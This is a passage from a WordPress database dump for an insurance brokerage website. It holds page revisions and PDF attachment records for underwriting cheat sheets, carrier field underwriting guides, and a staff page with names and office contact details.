style=\"text-align: justify;\">Cancer Personal History Guidelines</li>\r\n <li style=\"text-align: justify;\">Cholesterol Guidelines</li>\r\n <li style=\"text-align: justify;\">Driving History Guidelines</li>\r\n <li style=\"text-align: justify;\">Family History Guidelines</li>\r\n <li style=\"text-align: justify;\">Marijuana Usage Guidelines</li>\r\n <li style=\"text-align: justify;\">Tobacco Usage Guidelines</li>\r\n <li style=\"text-align: justify;\">Underwriting Programs Summary (Table Shaves, Lifestyle credits, etc.)</li>\r\n</ul>','Underwriting Cheat Sheets','','inherit','open','open','','383-revision-v1','','','2015-11-14 15:00:03','2015-11-14 15:00:03','',383,'http://www.empireins.com/383-revision-v1/',0,'revision','',0),(389,1,'2015-11-14 15:13:52','2015-11-14 15:13:52','','Aviation Cheat Sheet','','inherit','open','open','','aviation-cheat-sheet','','','2015-11-14 15:20:02','2015-11-14 15:20:02','',383,'http://www.empireins.com/wp-content/uploads/2015/11/Aviation-Cheat-Sheet.pdf',0,'attachment','application/pdf',0),(390,1,'2015-11-14 15:13:53','2015-11-14 15:13:53','','Avocation Exclusion Cheat Sheet','','inherit','open','open','','avocation-exclusion-cheat-sheet','','','2015-11-14 15:20:17','2015-11-14 15:20:17','',383,'http://www.empireins.com/wp-content/uploads/2015/11/Avocation-Exclusion-Cheat-Sheet.pdf',0,'attachment','application/pdf',0),(391,1,'2015-11-14 15:13:55','2015-11-14 15:13:55','','Bankruptcy History Cheat Sheet','','inherit','open','open','','bankruptcy-history-cheat-sheet','','','2015-11-14 15:20:27','2015-11-14 15:20:27','',383,'http://www.empireins.com/wp-content/uploads/2015/11/Bankruptcy-History-Cheat-Sheet.pdf',0,'attachment','application/pdf',0),(392,1,'2015-11-14 15:13:58','2015-11-14 15:13:58','','Blood Pressure Guidelines','','inherit','open','open','','blood-pressure-cheat-sheet','','','2015-11-14 15:21:25','2015-11-14 15:21:25','',383,'http://www.empireins.com/wp-content/uploads/2015/11/Blood-Pressure-Cheat-Sheet.pdf',0,'attachment','application/pdf',0),(393,1,'2015-11-14 15:14:01','2015-11-14 15:14:01','','Cancer Personal History Guidelines','','inherit','open','open','','cancer-history-cheat-sheet','','','2015-11-14 15:21:41','2015-11-14 15:21:41','',383,'http://www.empireins.com/wp-content/uploads/2015/11/Cancer-History-Cheat-Sheet.pdf',0,'attachment','application/pdf',0),(394,1,'2015-11-14 15:14:03','2015-11-14 15:14:03','','Cholesterol Guidelines','','inherit','open','open','','cholesterol-cheat-sheet','','','2015-11-14 15:21:51','2015-11-14 15:21:51','',383,'http://www.empireins.com/wp-content/uploads/2015/11/Cholesterol-Cheat-Sheet.pdf',0,'attachment','application/pdf',0),(395,1,'2015-11-14 15:14:05','2015-11-14 15:14:05','','Driving History Cheat Sheet','','inherit','open','open','','driving-history-cheat-sheet','','','2015-11-14 15:22:04','2015-11-14 15:22:04','',383,'http://www.empireins.com/wp-content/uploads/2015/11/Driving-History-Cheat-Sheet.pdf',0,'attachment','application/pdf',0),(396,1,'2015-11-14 15:14:07','2015-11-14 15:14:07','','Family History Guidelines','','inherit','open','open','','family-history-cheat-sheet','','','2015-11-14 15:22:26','2015-11-14 15:22:26','',383,'http://www.empireins.com/wp-content/uploads/2015/11/Family-History-Cheat-Sheet.pdf',0,'attachment','application/pdf',0),(397,1,'2015-11-14 15:14:10','2015-11-14 15:14:10','','Marijuana Usage Guidelines','','inherit','open','open','','marijuana-usage-cheat-sheet','','','2015-11-14 15:22:38','2015-11-14 15:22:38','',383,'http://www.empireins.com/wp-content/uploads/2015/11/Marijuana-Usage-Cheat-Sheet.pdf',0,'attachment','application/pdf',0),(398,1,'2015-11-14 15:14:11','2015-11-14 15:14:11','','Tobacco Usage Guidelines','','inherit','open','open','','tobacco-usage-cheat-sheet','','','2015-11-14 15:22:47','2015-11-14 15:22:47','',383,'http://www.empireins.com/wp-content/uploads/2015/11/Tobacco-Usage-Cheat-Sheet.pdf',0,'attachment','application/pdf',0),(399,1,'2015-11-14 15:14:14','2015-11-14 15:14:14','','Underwriting Programs Summary','','inherit','open','open','','underwriting-programs-cheat-sheet','','','2015-11-14 15:23:00','2015-11-14 15:23:00','',383,'http://www.empireins.com/wp-content/uploads/2015/11/Underwriting-Programs-Cheat-Sheet.pdf',0,'attachment','application/pdf',0),(400,1,'2015-11-14 15:23:19','2015-11-14 15:23:19','<p style=\"text-align: justify;\"><strong>Need a quick answer to how a wide cross section of insurance companies view a specific aspect of a client’s medical, personal or lifestyle history? This collection of Underwriting Cheat Sheets contain clear answers to straightforward questions that we all face on a day in, day out basis. Of course, when you have a unique situation that is not covered by these Cheat Sheets, the EIB Team is ready to step in and provide some insight on the more nuanced situation. Reach out to them by phone, or via email.</strong></p>\n\n\n<hr />\n\n<h4 style=\"text-align: justify;\">Carrier Underwriting Cheat Sheets</h4>\n<ul>\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Aviation-Cheat-Sheet.pdf\" target=\"_blank\">Aviation Guidelines</a></li>\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Avocation-Exclusion-Cheat-Sheet.pdf\" target=\"_blank\">Avocation Guidelines</a></li>\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Bankruptcy-History-Cheat-Sheet.pdf\" target=\"_blank\">Bankruptcy Guidelines</a></li>\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Blood-Pressure-Cheat-Sheet.pdf\">Blood Pressure Guidelines</a></li>\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Cancer-History-Cheat-Sheet.pdf\">Cancer Personal History Guidelines</a></li>\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Cholesterol-Cheat-Sheet.pdf\">Cholesterol Guidelines</a></li>\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Driving-History-Cheat-Sheet.pdf\">Driving History Guidelines</a></li>\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Family-History-Cheat-Sheet.pdf\">Family History Guidelines</a></li>\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Marijuana-Usage-Cheat-Sheet.pdf\">Marijuana Usage Guidelines</a></li>\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Tobacco-Usage-Cheat-Sheet.pdf\">Tobacco Usage Guidelines</a></li>\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Underwriting-Programs-Cheat-Sheet.pdf\">Underwriting Programs Summary</a> (Table Shaves, Lifestyle credits, etc.)</li>\n</ul>','Underwriting Cheat Sheets','','inherit','open','open','','383-autosave-v1','','','2015-11-14 15:23:19','2015-11-14 15:23:19','',383,'http://www.empireins.com/383-autosave-v1/',0,'revision','',0),(401,1,'2015-11-14 15:24:08','2015-11-14 15:24:08','<p style=\"text-align: justify;\"><strong>Need a quick answer to how a wide cross section of insurance companies view a specific aspect of a client’s medical, personal or lifestyle history? This collection of Underwriting Cheat Sheets contain clear answers to straightforward questions that we all face on a day in, day out basis. Of course, when you have a unique situation that is not covered by these Cheat Sheets, the EIB Team is ready to step in and provide some insight on the more nuanced situation. Reach out to them by phone, or via email.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Carrier Underwriting Cheat Sheets</h4>\r\n<ul>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Aviation-Cheat-Sheet.pdf\" target=\"_blank\">Aviation Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Avocation-Exclusion-Cheat-Sheet.pdf\" target=\"_blank\">Avocation Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Bankruptcy-History-Cheat-Sheet.pdf\" target=\"_blank\">Bankruptcy Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Blood-Pressure-Cheat-Sheet.pdf\" target=\"_blank\">Blood Pressure Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Cancer-History-Cheat-Sheet.pdf\" target=\"_blank\">Cancer Personal History Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Cholesterol-Cheat-Sheet.pdf\" target=\"_blank\">Cholesterol Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Driving-History-Cheat-Sheet.pdf\" target=\"_blank\">Driving History Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Family-History-Cheat-Sheet.pdf\" target=\"_blank\">Family History Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Marijuana-Usage-Cheat-Sheet.pdf\" target=\"_blank\">Marijuana Usage Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Tobacco-Usage-Cheat-Sheet.pdf\" target=\"_blank\">Tobacco Usage Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Underwriting-Programs-Cheat-Sheet.pdf\" target=\"_blank\">Underwriting Programs Summary</a> (Table Shaves, Lifestyle credits, etc.)</li>\r\n</ul>','Underwriting Cheat Sheets','','inherit','open','open','','383-revision-v1','','','2015-11-14 15:24:08','2015-11-14 15:24:08','',383,'http://www.empireins.com/383-revision-v1/',0,'revision','',0),(402,1,'2015-11-14 15:26:36','2015-11-14 15:26:36','','Accordia Life','','inherit','open','open','','acc-field-underwriting-guide','','','2015-11-14 15:27:56','2015-11-14 15:27:56','',379,'http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(403,1,'2015-11-14 15:26:39','2015-11-14 15:26:39','','AXA','','inherit','open','open','','axa-field-underwriting-guide','','','2015-11-14 15:28:09','2015-11-14 15:28:09','',379,'http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(404,1,'2015-11-14 15:26:42','2015-11-14 15:26:42','','Lincoln Financial','','inherit','open','open','','lfd-field-underwriting-guide','','','2015-11-14 15:27:34','2015-11-14 15:27:34','',379,'http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(405,1,'2015-11-14 15:26:44','2015-11-14 15:26:44','','Principal Financial','','inherit','open','open','','prn-field-underwriting-guide','','','2015-11-14 15:27:22','2015-11-14 15:27:22','',379,'http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(406,1,'2015-11-14 15:26:46','2015-11-14 15:26:46','','Protective Life','','inherit','open','open','','pro-field-underwriting-guide','','','2015-11-14 15:29:39','2015-11-14 15:29:39','',379,'http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(407,1,'2015-11-14 15:26:48','2015-11-14 15:26:48','','Symetra Financial','','inherit','open','open','','sym-field-underwriting-guide','','','2015-11-14 15:29:48','2015-11-14 15:29:48','',379,'http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(408,1,'2015-11-14 15:26:53','2015-11-14 15:26:53','','Transamerica','','inherit','open','open','','ta-field-underwriting-guide','','','2015-11-14 15:29:56','2015-11-14 15:29:56','',379,'http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(409,1,'2015-11-14 15:26:56','2015-11-14 15:26:56','','Voya Financial','','inherit','open','open','','vya-field-underwriting-guide','','','2015-11-14 15:30:06','2015-11-14 15:30:06','',379,'http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(410,1,'2015-11-14 15:26:59','2015-11-14 15:26:59','','MetLife','','inherit','open','open','','bduw24751_life_uw_guide-final_april-2015','','','2015-11-14 15:29:16','2015-11-14 15:29:16','',379,'http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf',0,'attachment','application/pdf',0),(411,1,'2015-11-14 15:27:02','2015-11-14 15:27:02','','AIG','','inherit','open','open','','aig-uw-guide-06-08-2015','','','2015-11-14 15:28:34','2015-11-14 15:28:34','',379,'http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf',0,'attachment','application/pdf',0),(412,1,'2015-11-14 15:27:05','2015-11-14 15:27:05','','John Hancock','','inherit','open','open','','jh-field-underwriting-guide','','','2015-11-14 15:28:49','2015-11-14 15:28:49','',379,'http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(413,1,'2015-11-14 15:27:06','2015-11-14 15:27:06','','Mutual of Omaha','','inherit','open','open','','moo-life-underwriting-guide-july-2015','','','2015-11-14 15:29:26','2015-11-14 15:29:26','',379,'http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf',0,'attachment','application/pdf',0),(414,1,'2015-11-14 15:27:14','2015-11-14 15:27:14','','Lincoln MoneyGuard','','inherit','open','open','','moneyguard-uw-resources','','','2015-11-14 15:29:01','2015-11-14 15:29:01','',379,'http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf',0,'attachment','application/pdf',0),(415,1,'2015-11-14 15:28:13','2015-11-14 15:28:13','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul style=\"text-align: justify;\">\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\">Accordia Life</a></li>\r\n <li>AIG</li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\">AXA</a></li>\r\n <li>John Hancock</li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\">Lincoln Financial</a></li>\r\n <li>Lincoln MoneyGuard</li>\r\n <li>MetLife</li>\r\n <li>Mutual of Omaha</li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\">Principal Financial</a></li>\r\n <li>Protective Life</li>\r\n <li>Symetra Financial</li>\r\n <li>Transamerica</li>\r\n <li>Voya Financial</li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-11-14 15:28:13','2015-11-14 15:28:13','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(416,1,'2015-11-14 15:31:21','2015-11-14 15:31:21','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul style=\"text-align: justify;\">\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-11-14 15:31:21','2015-11-14 15:31:21','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(417,1,'2015-11-14 15:32:23','2015-11-14 15:32:23','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-11-14 15:32:23','2015-11-14 15:32:23','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(419,1,'2015-11-23 21:24:52','2015-11-23 21:24:52','<hr />\n\n<h4 style=\"text-align: justify;\">David Braver - CEO and President</h4>\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 204 | <a href=\"mailto:david@empireins.com\">david@empireins.com</a></p>\n<p style=\"padding-left: 30px;\">More than a decade ago, Mr. David Braver recognized the community’s need for a trusted, elite, umbrella insurance brokerage firm. Initially founded as a family business, EIB has since flourished while maintaining its core honesty, integrity and warmth. David’s expertise has earned him the respect of underwriters and enabled him to create a highly reputable business where clients know they will receive the very best insurance coverage for their specific needs. Extensive research is conducted before EIB considers a relationship with any carrier, and more than thirty carriers are currently contracted with EIB. Since the founding of the company, many agents have counted on the wisdom of Mr. David Braver; to help them protect their clients’ assets and families.</p>\n\n\n<hr />\n\n<h4 style=\"text-align: justify;\">Gitty Braver - Controller</h4>\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 202 | <a href=\"mailto:gitty@empireins.com\">gitty@empireins.com</a></p>\n\n\n<hr />\n\n<h4 style=\"text-align: justify;\">Cheskel Braver - Sales and Marketing Director</h4>\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 207 | <a href=\"mailto:cheskel@empireins.com\">cheskel@empireins.com</a></p>\n<p style=\"text-align: justify; padding-left: 30px;\">Cheskel’s experience in sales and product design is immense. He has been enabling our agents to create custom portfolios designed to fully address their clients’ needs. Cheskel has earned a great deal of trust in the industry, and is respected by all agents for his extensive knowledge, input and opinion.</p>\n\n\n<hr />\n\n<h4 style=\"text-align: justify;\">Joel Zicherman - Illustrations and Product Design</h4>\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 212 | <a href=\"mailto:joel@empireins.com\">joel@empireins.com</a></p>\n<p style=\"text-align: justify; padding-left: 30px;\">Joel maintains constant contact with carriers to understand and evaluate new products and find niches that can benefit our agents. He understands the needs of the agents and their clients and is able to create the perfect product and illustration for each individual case.</p>\n\n\n<hr />\n\n<h4 style=\"text-align: justify;\"></h4>\n<h4 style=\"text-align: justify;\">Chaya Klein - Licensing and New Business Processor</h4>\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 200 | <a href=\"mailto:chaya@empireins.com\">chaya@empireins.com</a></p>\n<p style=\"text-align: justify; padding-left: 30px;\">Chaya has comprehensive knowledge in new business and underwriting. This allows her to review and evaluate any situation and then relay it to the underwriters for an offer. Her attention to detail along with her expertise ensures a job exceptionally well done to the complete satisfaction of our agents. When it comes to licensing and contracting, Chaya is the person. Her efficiency and perfection ensure a timely turnaround time and always with a smile.</p>\n\n\n<hr />\n\n<h4 style=\"text-align: justify;\">Roisy Deutsch - Commissions and New Business Processor</h4>\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 211 | <a href=\"mailto:roisy@empireins.com\">roisy@empireins.com</a></p>\n<p style=\"text-align: justify; padding-left: 30px;\">David’s daughter has inherited her father’s intelligence and is an integral part of the intake process. Her quick grasp of concepts can be evidenced by her thorough review, correction, and completion of incoming applications. Upon processing, Roisy conducts any necessary follow up and ensures a quick turn-around, enabling EIB to deliver policies to our agents in a timely manner. At EIB we pride ourselves on delivering agent and broker commissions on the very same day they arrive in our office. Under Roisy’s direction, this complicated task is executed with precision and perfection every time.</p>','Meet the EIB Team','','inherit','open','open','','347-autosave-v1','','','2015-11-23 21:24:52','2015-11-23 21:24:52','',347,'http://www.empireins.com/347-autosave-v1/',0,'revision','',0),(420,1,'2015-11-23 21:25:50','2015-11-23 21:25:50','<hr />\r\n\r\n<h4 style=\"text-align: justify;\">David Braver - CEO and President</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 204 | <a href=\"mailto:david@empireins.com\">david@empireins.com</a></p>\r\n<p style=\"padding-left: 30px;\">More than a decade ago, Mr. David Braver recognized the community’s need for a trusted, elite, umbrella insurance brokerage firm. Initially founded as a family business, EIB has since flourished while maintaining its core honesty, integrity and warmth. David’s expertise has earned him the respect of underwriters and enabled him to create a highly reputable business where clients know they will receive the very best insurance coverage for their specific needs. Extensive research is conducted before EIB considers a relationship with any carrier, and more than thirty carriers are currently contracted with EIB. Since the founding of the company, many agents have counted on the wisdom of Mr. David Braver; to help them protect their clients’ assets and families.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Gitty Braver - Controller</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 202 | <a href=\"mailto:gitty@empireins.com\">gitty@empireins.com</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Cheskel Braver - Sales and Marketing Director</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 207 | <a href=\"mailto:cheskel@empireins.com\">cheskel@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 30px;\">Cheskel’s experience in sales and product design is immense. He has been enabling our agents to create custom portfolios designed to fully address their clients’ needs. Cheskel has earned a great deal of trust in the industry, and is respected by all agents for his extensive knowledge, input and opinion.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Joel Zicherman - Illustrations and Product Design</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 212 | <a href=\"mailto:joel@empireins.com\">joel@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 30px;\">Joel maintains constant contact with carriers to understand and evaluate new products and find niches that can benefit our agents. He understands the needs of the agents and their clients and is able to create the perfect product and illustration for each individual case.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\"></h4>\r\n<h4 style=\"text-align: justify;\">Chaya Klein - Licensing and New Business Processor</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 200 | <a href=\"mailto:chaya@empireins.com\">chaya@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 30px;\">Chaya has comprehensive knowledge in new business and underwriting. This allows her to review and evaluate any situation and then relay it to the underwriters for an offer. Her attention to detail along with her expertise ensures a job exceptionally well done to the complete satisfaction of our agents. When it comes to licensing and contracting, Chaya is the person. Her efficiency and perfection ensure a timely turnaround time and always with a smile.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Roisy Deutsch - Commissions and New Business Processor</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 211 | <a href=\"mailto:roisy@empireins.com\">roisy@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 30px;\">David’s daughter has inherited her father’s intelligence and is an integral part of the intake process. Her quick grasp of concepts can be evidenced by her thorough review, correction, and completion of incoming applications. Upon processing, Roisy conducts any necessary follow up and ensures a quick turn-around, enabling EIB to deliver policies to our agents in a timely manner. At EIB we pride ourselves on delivering agent and broker commissions on the very same day they arrive in our office. Under Roisy’s direction, this complicated task is executed with precision and perfection every time.</p>','Meet the EIB Team','','inherit','open','open','','347-revision-v1','','','2015-11-23 21:25:50','2015-11-23 21:25:50','',347,'http://www.empireins.com/347-revision-v1/',0,'revision','',0),(422,1,'2015-12-09 16:09:06','2015-12-09 16:09:06','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" 